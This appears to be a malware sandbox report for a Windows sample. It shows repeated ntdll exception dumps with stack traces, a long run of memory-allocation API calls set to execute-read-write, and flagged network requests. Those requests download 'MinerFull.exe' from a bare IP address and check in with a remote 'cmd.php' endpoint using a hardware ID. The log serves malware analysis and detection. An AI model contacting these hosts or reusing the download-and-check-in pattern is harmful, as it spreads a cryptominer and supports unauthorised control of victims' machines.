0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244936
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244936
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244936
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244936
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://107.189.6.214/5fFjAn68/MinerFull.exe
request GET http://107.189.6.214/5fFjAn68/MinerFull.exe
request GET http://xxx01xzb.beget.tech/cmd.php?hwid=7C6024AD
request GET http://xxx01xzb.beget.tech/cmd.php?timeout=1
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 851968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000580000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000005d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef40a1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef473b000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 1310720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000001fe0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000020a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef40a2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef40a2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef40a2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef40a2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef40a2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef40a2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef40a2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef40a2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef40a2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef40a2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef40a2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef40a4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef40a4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef40a4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef40a4000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9492a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe949dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94a06000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe949e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9493c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94a50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9493a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9492b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9494b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9497c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9494d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94922000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94a90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
